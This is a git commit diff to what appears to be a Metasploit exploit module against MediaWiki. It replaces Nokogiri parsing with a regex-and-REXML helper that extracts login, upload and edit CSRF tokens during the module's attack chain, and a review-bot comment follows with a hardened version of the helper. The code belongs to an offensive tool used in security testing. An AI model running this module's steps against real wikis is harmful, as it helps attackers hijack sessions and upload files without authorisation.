I had a problem, then I used regex.
parent
57f4998568
commit
67c18d8d2d
|
@ -75,12 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Mediawiki will give a 404 for unknown pages but still have a body
|
||||
if response.code == 200 || response.code == 404
|
||||
vprint_status("#{response.code} response received...")
|
||||
response_html = Nokogiri::HTML(response.body)
|
||||
meta_gen_nodes = response_html.xpath("//meta[@name='generator']")
|
||||
meta_generator = get_html_value(response.body, 'meta', 'generator', 'content')
|
||||
|
||||
if meta_gen_nodes.first && meta_gen_nodes.first['content']
|
||||
meta_generator = meta_gen_nodes.first['content']
|
||||
else
|
||||
unless meta_generator
|
||||
vprint_status("No META Generator tag on #{full_uri}.")
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
@ -137,8 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
session_cookie = response.get_cookies
|
||||
|
||||
response_html = Nokogiri::HTML(response.body)
|
||||
wp_login_token = get_token_value(response_html, 'wpLoginToken')
|
||||
wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')
|
||||
|
||||
unless wp_login_token
|
||||
fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")
|
||||
|
@ -182,10 +178,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::NotFound, "Failed to access file upload page.")
|
||||
end
|
||||
|
||||
upload_file_html = Nokogiri::HTML(upload_file.body)
|
||||
wp_edit_token = get_token_value(upload_file_html, 'wpEditToken')
|
||||
wp_upload = get_token_value(upload_file_html, 'wpUpload')
|
||||
title = get_token_value(upload_file_html, 'title')
|
||||
wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value')
|
||||
wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')
|
||||
title = get_html_value(upload_file.body, 'input', 'title', 'value')
|
||||
|
||||
unless wp_edit_token
|
||||
fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")
|
||||
|
@ -246,15 +241,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::NotFound, "Failed to open target edit page: #{random_page}.")
|
||||
end
|
||||
|
||||
random_html = Nokogiri::HTML(random_edit.body)
|
||||
|
||||
wp_auto_summary = get_token_value(random_html, 'wpAutoSummary')
|
||||
wp_edit_token = get_token_value(random_html, 'wpEditToken')
|
||||
wp_start_time = get_token_value(random_html, 'wpStarttime')
|
||||
wp_edit_time = get_token_value(random_html, 'wpEdittime')
|
||||
old_id = get_token_value(random_html, 'oldid')
|
||||
wp_scroll_top = get_token_value(random_html, 'wpScrolltop')
|
||||
wp_section = get_token_value(random_html, 'wpSection')
|
||||
wp_auto_summary = get_html_value(random_edit.body, 'input', 'wpAutoSummary', 'value')
|
||||
wp_edit_token = get_html_value(random_edit.body, 'input', 'wpEditToken', 'value')
|
||||
wp_start_time = get_html_value(random_edit.body, 'input', 'wpStarttime', 'value')
|
||||
wp_edit_time = get_html_value(random_edit.body, 'input', 'wpEdittime', 'value')
|
||||
old_id = get_html_value(random_edit.body, 'input', 'oldid', 'value')
|
||||
wp_scroll_top = get_html_value(random_edit.body, 'input', 'wpScrolltop', 'value')
|
||||
wp_section = get_html_value(random_edit.body, 'input', 'wpSection', 'value')
|
||||
|
||||
if wp_edit_token
|
||||
print_good("Retrieved edit CSRF token.")
|
||||
|
@ -292,12 +285,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
def get_token_value(document, value_name)
|
||||
return nil unless document
|
||||
return nil unless value_name
|
||||
node = document.xpath("//input[@name='#{value_name}']")
|
||||
return nil unless node
|
||||
node.first['value']
|
||||
# The order of name, value keeps shifting so regex is painful.
|
||||
# Cant use nokogiri due to security issues
|
||||
# Cant use REXML directly as its not strict XHTML
|
||||
# So we do a filthy mixture of regex and REXML
|
||||
def get_html_value(html, type, name, value)
|
||||
return nil unless html
|
||||
return nil unless type
|
||||
return nil unless name
|
||||
return nil unless value
|
||||
|
||||
found = nil
|
||||
html.each_line do |line|
|
||||
if line =~ /(<#{type}[^\/]*name="#{name}".*?\/>)/i
|
||||
found = $&
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
if found
|
||||
doc = REXML::Document.new found
|
||||
return doc.root.attributes[value]
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
|
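Review bot: In `get_html_value` (last hunk) the `REXML::Document.new found` call has no rescue, so a matched tag that is not well-formed XML — an unescaped `&` in an attribute value, an unquoted attribute, a stray quote — raises `REXML::ParseException` and aborts the module instead of reaching the `fail_with` paths the callers already have for a missing token; the input here is the target server's response, so it should be treated as untrusted and the parse failure turned into a `nil` return. The same helper interpolates `type` and `name` straight into the regex; every caller in this diff passes a string literal, but wrapping them in `Regexp.escape` keeps the helper safe should a caller later pass a value taken from a datastore option or the response. Separately, and hedged because I can only see these hunks, the `[^\/]*` between the tag name and `name="…"` makes the match fail when an earlier attribute contains a slash (a URL in `value=`), and the mandatory `\/>` skips tags that are not self-closing, so a page that renders `<input … name="wpEditToken">` without the slash would be reported as "Couldn't find upload token".
```ruby
def get_html_value(html, type, name, value)
  # … unchanged: nil guards for html/type/name/value …
  found = nil
  html.each_line do |line|
    if line =~ /(<#{Regexp.escape(type)}[^\/]*name="#{Regexp.escape(name)}".*?\/>)/i
      found = $&
      break
    end
  end

  if found
    begin
      doc = REXML::Document.new found
      return doc.root.attributes[value]
    rescue REXML::ParseException
      # Server returned a tag fragment REXML cannot parse; treat as not found
      return nil
    end
  end

  nil
end
```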
|